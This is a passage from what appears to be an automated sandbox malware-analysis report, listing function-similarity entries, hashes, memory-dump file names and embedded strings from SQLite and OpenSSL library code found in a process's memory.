                                                                                                                                                                                                                                                              • Instruction ID: fc173393a1fafb79c607b35f7a1fe89c51318c6398ca64c967e021d1ad28c6ce
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b258cba78216c913fdfc967b650a3a4584fc30d2e89a2d53fb082f1872007e41
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBD12162F0AB86A2EB60CB15A0447BA7BA1FB49BD4F446171DE5E03785DF3CE441C728
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • 00007FF8BFAB19C0.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00000000,?,?,00000000,00007FF8A885685C,?,?,?), ref: 00007FF8A8856030
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                                                              • API String ID: 3568877910-2903559916
                                                                                                                                                                                                                                                              • Opcode ID: d66b9d54725f62b5ce1bd60dd10b0ea20f78a451d91f1eae2825429aabd4dd91
                                                                                                                                                                                                                                                              • Instruction ID: c333afa968b229a16578b0a357860981c27f40c9dba2eaae9d304f048a46c521
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d66b9d54725f62b5ce1bd60dd10b0ea20f78a451d91f1eae2825429aabd4dd91
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20C12232B0A682A5EA69CB1195443BA6BA0FF40FC4F48A2B5DE4D477C5DF3CE401C728
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                                              • API String ID: 3568877910-1987291987
                                                                                                                                                                                                                                                              • Opcode ID: ea895bfc650ea91978c060a6855d4ea3768f7d4080edd1a1708a15e8b8dd4161
                                                                                                                                                                                                                                                              • Instruction ID: 7592462deabf4f0feb88413138edb48ca370cad9770f90b545e496a32640fcfa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea895bfc650ea91978c060a6855d4ea3768f7d4080edd1a1708a15e8b8dd4161
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3C1DC32B0AA82A6EB14CF56A44427967A0FFA5BE1F484235DE6E477D5EF3CE400C714
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                              • API String ID: 3568877910-3764764234
                                                                                                                                                                                                                                                              • Opcode ID: bee7a4693849ac17a4bb1783f6fa8d2d9d5e3edc2d9436c2f20dc9f1ba8472f5
                                                                                                                                                                                                                                                              • Instruction ID: dd261d711186f00dea033600174d9c99abf9a87d13245de8f4cc78f0f3e42147
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bee7a4693849ac17a4bb1783f6fa8d2d9d5e3edc2d9436c2f20dc9f1ba8472f5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAB1EE32B096AA96E764CB2AA044B7AB7A4FF48BC0F014135DE4D47B85DF79E840C714
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                              • API String ID: 0-3764764234
                                                                                                                                                                                                                                                              • Opcode ID: da0e3b0cac070f2e21a81489abfb1d15809828ce554804e79c7fc2e092d5fd35
                                                                                                                                                                                                                                                              • Instruction ID: 3347734c35816d05c06bcaa944702f281eddc29137e812715224a515711af5ca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da0e3b0cac070f2e21a81489abfb1d15809828ce554804e79c7fc2e092d5fd35
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FA15633A0E2D16BD7648B2894946BE7BA1FB817C4F444275DB8A83B81EF3CE545C724
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                                                                                                              • API String ID: 3568877910-2815843928
                                                                                                                                                                                                                                                              • Opcode ID: 1a8e526a86d5bd3d1dc346dfb474fdedb13c42aa3d381dcbd1f76d89d3ec6e10
                                                                                                                                                                                                                                                              • Instruction ID: 8b8d41e790bffb5ad3ba0aa5c2d3122d072e162f1a6e9cb0cbce8ab45f049533
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a8e526a86d5bd3d1dc346dfb474fdedb13c42aa3d381dcbd1f76d89d3ec6e10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CC19121A0FB42A6EB64DB21E4586797BA0FF44BD1F484135D95E432A0EF3CE444CB68
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                              • API String ID: 3568877910-3764764234
                                                                                                                                                                                                                                                              • Opcode ID: 46965cf42d5689f6b193c2113cb8e7912a1c14311205a5f033bcee06f9a4063e
                                                                                                                                                                                                                                                              • Instruction ID: fe87ec12ab00333624b24df0a0311dc944ac2ab7ae4b209c09cedf01430d7d19
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46965cf42d5689f6b193c2113cb8e7912a1c14311205a5f033bcee06f9a4063e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24815723A0E2D16AE321CE25A0505F93E90E7117D1F4541BAEFCA477C1EB3CD986D728
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C61208
                                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
                                                                                                                                                                                                                                                              • API String ID: 3535234312-2527649602
                                                                                                                                                                                                                                                              • Opcode ID: 0e985a8a8b04577a75530f8da03813db32c934ecaddc4bfaf0d1495dbf65c132
                                                                                                                                                                                                                                                              • Instruction ID: 884ae8ecf7ae38f5ce70552fa0e0a95e556a5176f05f831fb70266966fc49e38
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e985a8a8b04577a75530f8da03813db32c934ecaddc4bfaf0d1495dbf65c132
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CB17C21A0EAC2A2FB44EF61C8547F927A1FB84BC4F445035EA1DCB6AADF7CE5548310
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                                              • API String ID: 3568877910-2063813899
                                                                                                                                                                                                                                                              • Opcode ID: bac2819c299c2b8c8ae7ca61fdce0dbf7122666c5b70fc67fee337eb904e85ee
                                                                                                                                                                                                                                                              • Instruction ID: 9323d28482951471bd9454eb28d1dcb961f55c638c37c7e36ec33a1bf0e97b19
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bac2819c299c2b8c8ae7ca61fdce0dbf7122666c5b70fc67fee337eb904e85ee
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A91EE62A0AB8596EB90CF41A4042BE77A5FF48BC1F498275DEAD07785EF3CE040C724
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007B1170
                                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
                                                                                                                                                                                                                                                              • API String ID: 1749704820-4157686371
                                                                                                                                                                                                                                                              • Opcode ID: 4701a5b41dac6050d5a31ac7eef3957fda4ec9d044bd4018a4c05d58d4e8cbf3
                                                                                                                                                                                                                                                              • Instruction ID: 11bce9a8da3a585cc0e24935f8292b7fea463ab7d61480feaec3c5d1a44e16de
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4701a5b41dac6050d5a31ac7eef3957fda4ec9d044bd4018a4c05d58d4e8cbf3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F671C061A0EFC2A5EB609F21D4007BAB3A1EF967C4F586032DA5DC7A96DF2CE5408700
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2480153841.00007FF8A8181000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8180000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480032989.00007FF8A8180000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A81E2000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A822E000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8231000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8236000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8290000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8293000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8295000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8298000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481039753.00007FF8A8299000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481081086.00007FF8A829B000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a8180000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C6126570
                                                                                                                                                                                                                                                              • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                                              • API String ID: 800424832-87138338
                                                                                                                                                                                                                                                              • Opcode ID: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
                                                                                                                                                                                                                                                              • Instruction ID: 836de692d6d5b6435aff83334d9e40ea2ceeb8306696185e625e915e0197534a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95614472B1964266E6638E19A8016BA72A2FFA0BD4F544231EE5D43AC9DF7CE402C714
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                              • API String ID: 3568877910-3764764234
                                                                                                                                                                                                                                                              • Opcode ID: 0c51845e98e7720e469689b203a582e8fc8cb0b60341d8e22a06a30507cc7d53
                                                                                                                                                                                                                                                              • Instruction ID: 64f186634bfe1b2048628f807fbae097af92a210e0e8935b5b36f757a0617284
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c51845e98e7720e469689b203a582e8fc8cb0b60341d8e22a06a30507cc7d53
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE51782361AB82A7EB54CB26E5447AA73A4FB48BC4F584036DF4D43B94EF38E491C314
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                              • API String ID: 3568877910-3764764234
                                                                                                                                                                                                                                                              • Opcode ID: fa40007d604dc6cc06400549b7ec3b66cbe8079a186df2d3bd517a7d904fd4b9
                                                                                                                                                                                                                                                              • Instruction ID: f0dc5c33962669a9ad92bfffd9e619786280868213930bd2f49bcfba904deb22
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa40007d604dc6cc06400549b7ec3b66cbe8079a186df2d3bd517a7d904fd4b9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A741DE32A2974693EB618F15E0402AD77A9FF88BD0F940135EE8E67794EF3CD8418754
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
